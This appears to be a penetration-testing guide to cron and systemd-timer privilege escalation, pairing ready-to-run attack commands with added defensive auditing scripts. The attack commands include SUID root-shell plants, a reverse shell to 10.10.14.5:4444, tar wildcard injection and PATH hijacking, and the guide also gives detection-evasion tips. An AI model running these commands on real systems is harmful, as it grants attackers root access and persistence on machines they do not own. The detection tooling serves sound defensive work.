
Cron Job Exploitation

# Overview

Cron jobs are scheduled tasks that run at specified intervals with the privileges of their owner (often root). When a cron job executes a script that a low-privileged user can write, calls commands without absolute paths (PATH hijacking), or passes a wildcard to a command that accepts options from file names (wildcard injection), it becomes a privilege escalation vector. The key insight: if root executes something you can modify, you become root.

# Prerequisites

  • User-level shell access
  • Read access to cron directories and scripts
  • Write access to at least one component of the cron execution chain

# Detection & Enumeration

```bash
# System-wide crontab
cat /etc/crontab

# Cron directories
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/

# User crontabs
ls -la /var/spool/cron/crontabs/
cat /var/spool/cron/crontabs/root

# anacron (for systems that don't run 24/7)
cat /etc/anacrontab

# systemd timers (modern alternative to cron)
systemctl list-timers --all

# Use pspy to observe cron execution without root
# pspy64 shows commands run by other users including root
./pspy64 -p -i 1000
```

# Exploitation / Execution

# Writable Cron Scripts or Binaries

```bash
# Find cron-related files that are world-writable
find /etc/cron* -writable -type f 2>/dev/null
find /var/spool/cron/crontabs -writable -type f 2>/dev/null

# If a cron script is writable:
echo 'cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash' >> /etc/cron.hourly/cleanup.sh
# Wait for cron to execute, then:
/tmp/rootbash -p

# Or direct reverse shell:
echo 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1' >> /etc/cron.daily/backup.sh
```

# PATH Hijacking in Cron Jobs

When a cron job uses commands without absolute paths:

```bash
# Read the cron job script
cat /etc/crontab
# If PATH is set to /tmp or a writable directory, or if a script calls 'ls' without /bin/ls:

# Check what the script runs without absolute paths
cat /etc/cron.d/cleanup
# If it calls: tar, gzip, rsync, find (without absolute paths)

# Create a malicious replacement in a directory that's first in cron's PATH
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /tmp/tar
chmod +x /tmp/tar

# Wait for cron to run the job
# Execute /tmp/rootbash -p for root shell
```

# Wildcard Injection in Cron Jobs

When a cron job uses tar or other commands with wildcards:

```bash
# Tar wildcard exploitation:
# If root's cron runs: tar -czf /backup/backup.tar.gz /var/www/*
# Exploit:

# Create the payload script in the directory being archived
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /var/www/shell.sh
chmod +x /var/www/shell.sh

# Create files whose names look like tar options: the shell expands /var/www/*
# into these names and tar parses anything starting with -- as an option
touch /var/www/--checkpoint=1
touch /var/www/--checkpoint-action=exec=/var/www/shell.sh

# When tar runs, --checkpoint-action executes the script as the cron user (root)
```
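The three weaknesses in the sections above (a writable scheduled script, a program named without a path, a wildcard argument) can be checked from the defender's side with a single pass over a crontab. The following is an added example, not code from the original module: a bash auditor that parses system-format crontab lines (schedule, user, command) or, with `user` as the second argument, user crontabs, and reports one finding per line. The sample crontab and scripts built by `make_sample` are constructed for the demo; GNU `stat` is assumed.

```bash
#!/usr/bin/env bash
# Added example, not part of the original module: a defender-side crontab auditor.
# For every job line it reports
#   WRITABLE  - the program is an absolute path that group or other can write
#   RELATIVE  - the program is named without a path, so cron's PATH decides
#   WILDCARD  - the command line contains '*', the wildcard-injection pattern
# GNU stat is assumed; the crontab and scripts in make_sample are constructed.

# audit_crontab FILE [system|user]: print one finding per line, always returns 0
audit_crontab() {
    local file=$1 format=${2:-system}
    local line words nfields cmd joined segs seg first perms
    while IFS= read -r line || [ -n "$line" ]; do
        # skip blank lines, comments and NAME=value environment settings
        case $line in ''|\#*|[A-Za-z_]*=*) continue ;; esac
        read -r -a words <<<"$line"
        [ "${#words[@]}" -gt 0 ] || continue
        # five schedule fields, or one for @reboot/@daily; system format adds a user field
        if [[ ${words[0]} == @* ]]; then nfields=1; else nfields=5; fi
        [ "$format" = user ] || nfields=$((nfields + 1))
        cmd="${words[*]:nfields}"
        [ -n "$cmd" ] || continue
        case $cmd in *\**) echo "WILDCARD  $cmd" ;; esac
        # split lists and pipelines into simple commands, then inspect each program
        joined=${cmd//'&&'/;}; joined=${joined//'||'/;}; joined=${joined//'|'/;}
        IFS=';' read -r -a segs <<<"$joined"
        for seg in "${segs[@]}"; do
            read -r first _ <<<"$seg"            # first word, leading blanks dropped
            case $first in
                ''|cd|export|test|\[) continue ;;   # shell builtins, nothing to resolve
                /*)
                    [ -e "$first" ] || continue
                    perms=$(stat -c %a "$first" 2>/dev/null) || continue
                    if (( (8#$perms & 8#022) != 0 )); then
                        echo "WRITABLE  $first (mode $perms)"
                    fi ;;
                *) echo "RELATIVE  $first" ;;
            esac
        done
    done <"$file"
    return 0
}

# make_sample DIR: constructed system crontab plus two scripts under DIR, one of
# them world-writable; prints the crontab path
make_sample() {
    local dir=$1
    printf '#!/bin/sh\necho cleanup\n' >"$dir/cleanup.sh"; chmod 755 "$dir/cleanup.sh"
    printf '#!/bin/sh\necho backup\n'  >"$dir/backup.sh";  chmod 666 "$dir/backup.sh"
    cat >"$dir/crontab" <<EOF
# constructed sample, system crontab format
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
0 * * * * root $dir/cleanup.sh
*/5 * * * * root $dir/backup.sh > /dev/null 2>&1
0 2 * * * root tar -czf /backup/www.tgz /var/www/*
30 3 * * * root cd /var/log && gzip old.log
@daily root $dir/cleanup.sh --full
EOF
    echo "$dir/crontab"
}

# demo: expected findings are one WRITABLE (backup.sh), RELATIVE tar and gzip,
# and one WILDCARD (the tar line)
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    tmp=$(mktemp -d)
    audit_crontab "$(make_sample "$tmp")"
    rm -rf "$tmp"
fi
```

Run it as `audit_crontab /etc/crontab` for the system table, `audit_crontab /var/spool/cron/crontabs/root user` for a user table. RELATIVE hits are only a problem when cron's PATH contains a directory others can write or create, which is why the PATH line itself deserves its own check.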

# pspy for Cron Detection

pspy is invaluable for discovering hidden cron jobs:

```bash
# Download and run pspy to monitor processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64 -p -i 1000  # Poll every 1000ms

# pspy shows:
# - Commands executed by root and other users
# - Full command lines, arguments, working directory
# - Frequency of execution (helps identify cron intervals)
# - Cron jobs not visible in /etc/crontab (e.g., set via `crontab -e`)
```

# Systemd Timers (Cron Alternative)

```bash
# List all timers
systemctl list-timers --all

# Inspect a specific timer and the service it triggers
systemctl cat cleanup.timer
systemctl cat cleanup.service

# If the service file is writable:
# Modify ExecStart to spawn a shell
echo '[Service]
ExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
' > /etc/systemd/system/writable-service.service

systemctl daemon-reload
# Wait for timer or restart service
/tmp/rootbash -p
```
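The same review applies to the unit file a timer triggers. Below is an added example, not code from the original module: a bash check that flags a unit file group or world can write (its `ExecStart=` can be rewritten), a program on an `Exec*=` line that is itself writable, a program given without an absolute path, and an inline `sh -c`/`bash -c` command worth reading by hand. The unit file and helper script built by `make_unit_sample` are constructed for the demo; GNU `stat` is assumed.

```bash
#!/usr/bin/env bash
# Added example, not part of the original module: audit a systemd service unit
# the way the cron sections audit scripts. GNU stat is assumed; the unit and
# script in make_unit_sample are constructed.

# writable_by_others PATH: true if group or other has write permission
writable_by_others() {
    local perms
    perms=$(stat -L -c %a "$1" 2>/dev/null) || return 1
    (( (8#$perms & 8#022) != 0 ))
}

# audit_unit UNITFILE: print one finding per line, always returns 0
audit_unit() {
    local unit=$1 line prog
    if writable_by_others "$unit"; then
        echo "WRITABLE  $unit (unit file itself)"
    fi
    while IFS= read -r line; do
        prog=${line#*=}
        prog=${prog#"${prog%%[![:space:]]*}"}                    # drop leading blanks
        while [[ $prog == [-@:+!]* ]]; do prog=${prog#?}; done    # drop systemd prefixes
        case $prog in
            */sh\ -c*|*/bash\ -c*) echo "INLINE    $line (shell -c command, review by hand)" ;;
        esac
        prog=${prog%%[[:space:]]*}                               # program name only
        case $prog in
            '') ;;
            /*) if [ -e "$prog" ] && writable_by_others "$prog"; then
                    echo "WRITABLE  $prog (run by $unit)"
                fi ;;
            *)  echo "RELATIVE  $prog (resolved via systemd's search path)" ;;
        esac
    done < <(grep -E '^Exec(Start|StartPre|StartPost|Stop|Reload)=' "$unit")
    return 0
}

# make_unit_sample DIR: constructed oneshot service with a group-writable unit
# file and a world-writable script; prints the unit path
make_unit_sample() {
    local dir=$1
    printf '#!/bin/sh\necho cleaning\n' >"$dir/cleanup.sh"; chmod 777 "$dir/cleanup.sh"
    cat >"$dir/cleanup.service" <<EOF
# constructed sample unit
[Unit]
Description=nightly cleanup (constructed sample)

[Service]
Type=oneshot
ExecStartPre=-$dir/cleanup.sh --dry-run
ExecStart=$dir/cleanup.sh
EOF
    chmod 664 "$dir/cleanup.service"
    echo "$dir/cleanup.service"
}

# demo: expected findings are WRITABLE for the unit file and for cleanup.sh twice
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    tmp=$(mktemp -d)
    audit_unit "$(make_unit_sample "$tmp")"
    rm -rf "$tmp"
fi
```

On a live host, feed it the paths printed by `systemctl cat cleanup.service` (usually under /etc/systemd/system or /usr/lib/systemd/system); a timer's own unit file matters too, since a writable `.timer` lets the schedule be changed.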

# anacron Jobs

```bash
# Check anacron configuration
cat /etc/anacrontab

# Same exploitation methods as cron -- writable scripts, PATH hijacking, wildcards
```

# Missing Directories in Cron PATH

```bash
# Check cron's PATH variable
grep '^PATH=' /etc/crontab

# If a directory in cron's PATH doesn't exist, create it and plant a malicious binary
# Example: PATH=/home/user/.local/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin
# If /home/user/.local/bin doesn't exist, <command> being a program a job calls without a path:
mkdir -p /home/user/.local/bin
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /home/user/.local/bin/<command>
chmod +x /home/user/.local/bin/<command>
```
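Checking the `PATH=` line itself is the defender's counterpart to this section. The following is an added example, not code from the original module: a bash function that classifies every directory in a crontab's PATH as empty or `.` (searched in the job's working directory), relative, missing (reporting the nearest existing parent and its mode and owner, which decide who can create it), or present but group/world writable. The crontab and directory tree built by `make_path_sample` are constructed for the demo; GNU `stat` is assumed.

```bash
#!/usr/bin/env bash
# Added example, not part of the original module: audit the PATH= line of a
# crontab. GNU stat is assumed; the sample tree in make_path_sample is constructed.

# audit_cron_path CRONTAB: print one finding per PATH entry that needs attention
audit_cron_path() {
    local file=$1 path rest dir parent perms
    path=$(sed -n 's/^[[:space:]]*PATH=//p' "$file" | tail -n 1)
    if [ -z "$path" ]; then
        echo "NOPATH    no PATH= line; cron uses its compiled-in default"
        return 0
    fi
    rest=$path:                     # trailing ':' so the last entry is processed too
    while [ -n "$rest" ]; do
        dir=${rest%%:*}; rest=${rest#*:}
        case $dir in
            ''|.) echo "CWD       empty or '.' entry searches the job's working directory" ;;
            [!/]*) echo "RELATIVE  $dir is not an absolute path" ;;
            *)
                if [ -d "$dir" ]; then
                    perms=$(stat -c %a "$dir")
                    if (( (8#$perms & 8#022) != 0 )); then
                        echo "WRITABLE  $dir (mode $perms): anyone can drop a binary here"
                    fi
                else
                    # walk up to the nearest existing parent: whoever can write
                    # it can create the missing directory
                    parent=$dir
                    while [ ! -d "$parent" ]; do parent=$(dirname "$parent"); done
                    echo "MISSING   $dir does not exist; parent $parent is mode $(stat -c %a "$parent"), owner $(stat -c %U "$parent")"
                fi ;;
        esac
    done
    return 0
}

# make_path_sample DIR: constructed crontab whose PATH has a missing directory,
# a world-writable one, a sane one and a trailing empty entry; prints its path
make_path_sample() {
    local dir=$1
    mkdir -p "$dir/wbin" "$dir/sbin"
    chmod 777 "$dir/wbin"; chmod 755 "$dir/sbin"
    printf 'PATH=%s/.local/bin:%s/wbin:%s/sbin:\n0 * * * * root backup.sh\n' \
        "$dir" "$dir" "$dir" >"$dir/crontab"
    echo "$dir/crontab"
}

# demo: expected findings are MISSING, WRITABLE and CWD
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    tmp=$(mktemp -d)
    audit_cron_path "$(make_path_sample "$tmp")"
    rm -rf "$tmp"
fi
```

A MISSING entry is only exploitable when a non-root user owns or can write the reported parent, which is exactly the `/home/user/.local/bin` case above; a WRITABLE one is a problem regardless of the sticky bit, because `/tmp/tar` can still be created there.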

# Common Pitfalls

  • Waiting for the cron job to execute -- check with ls -la /tmp/rootbash whether it has been created yet
  • Not checking ALL cron directories (hourly, daily, weekly, monthly, cron.d, user crontabs, anacron)
  • Assuming /etc/crontab lists everything -- user crontabs (crontab -e) are in /var/spool/cron/
  • Cron PATH is often different from user PATH -- check it explicitly
  • Newer systems use systemd timers instead of cron -- don't overlook them
  • Tar wildcard exploits may not work if tar has been patched against this specific attack

# OPSEC Considerations

  • Reading /etc/crontab is standard admin behavior and is not normally monitored.
  • Creating files in world-writable directories is normal but creating files named --checkpoint=1 is suspicious.
  • Cron modifications are logged if auditd or specific cron logging is enabled.
  • pspy generates sustained process monitoring activity that may be flagged by EDR.
  • Creating a SUID /tmp/rootbash is very noisy -- prefer ephemeral shells or SSH key injection.
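The artefacts these notes call out are also what a defender sweeps for. Below is an added example, not code from the original module: a bash sweep for option-shaped file names such as `--checkpoint=1` in an archived directory, setuid files planted in scratch directories, and cron sources modified recently. The sample tree built by `make_indicator_sample` is constructed for the demo; GNU `find` is assumed.

```bash
#!/usr/bin/env bash
# Added example, not part of the original module: hunt for the traces the
# techniques above leave behind. GNU find is assumed; the tree in
# make_indicator_sample is constructed.

# scan_indicators DIR...: print one finding per suspicious file, always returns 0
scan_indicators() {
    local dir
    for dir in "$@"; do
        # a file name beginning with "--" exists only to be parsed as an option
        find "$dir" -name '--*' -printf 'OPTION-NAME  %p\n' 2>/dev/null
        # a setuid file outside the package-managed tree is the classic planted shell
        find "$dir" -type f -perm -4000 -printf 'SETUID       %p (owner %u, mode %m)\n' 2>/dev/null
    done
    return 0
}

# recent_cron_changes MINUTES DIR...: cron sources modified within MINUTES
recent_cron_changes() {
    local minutes=$1; shift
    find "$@" -type f -mmin "-$minutes" -printf 'MODIFIED     %p (%TY-%Tm-%Td %TH:%TM)\n' 2>/dev/null
    return 0
}

# make_indicator_sample DIR: constructed tree with two option-named files, one
# setuid file and one freshly written cron.d entry
make_indicator_sample() {
    local dir=$1
    mkdir -p "$dir/www" "$dir/tmp" "$dir/cron.d"
    : >"$dir/www/--checkpoint=1"
    : >"$dir/www/--checkpoint-action=exec=shell.sh"
    printf '#!/bin/sh\n' >"$dir/tmp/rootbash"; chmod 4755 "$dir/tmp/rootbash"
    printf '0 * * * * root /usr/bin/true\n' >"$dir/cron.d/cleanup"
}

# demo: expected output is two OPTION-NAME lines, one SETUID line, one MODIFIED line
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    tmp=$(mktemp -d)
    make_indicator_sample "$tmp"
    scan_indicators "$tmp/www" "$tmp/tmp"
    recent_cron_changes 60 "$tmp/cron.d"
    rm -rf "$tmp"
fi
```

On a real host the directories to pass are the ones root's jobs archive or iterate over, the usual scratch locations (/tmp, /var/tmp, /dev/shm), and /etc/crontab, /etc/cron*, /var/spool/cron and /etc/systemd/system for the modification check; pair it with auditd watches on those paths for continuous coverage rather than a periodic sweep.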

# Post-Exploitation Value

Cron exploitation provides root command execution at the next cron interval. Results can persist through reboots if the malicious script is not detected. Direct root shell access or SUID backdoor enables full system compromise.

# Cross-References

# Tool References

| Tool | Link |
| --- | --- |
| pspy | https://github.com/DominicBreuker/pspy |

# Source Machines

  • Generic Linux - Cron wildcard injection with tar
  • Monitored (Medium, Linux) - Systemd timer + cron-like service abuse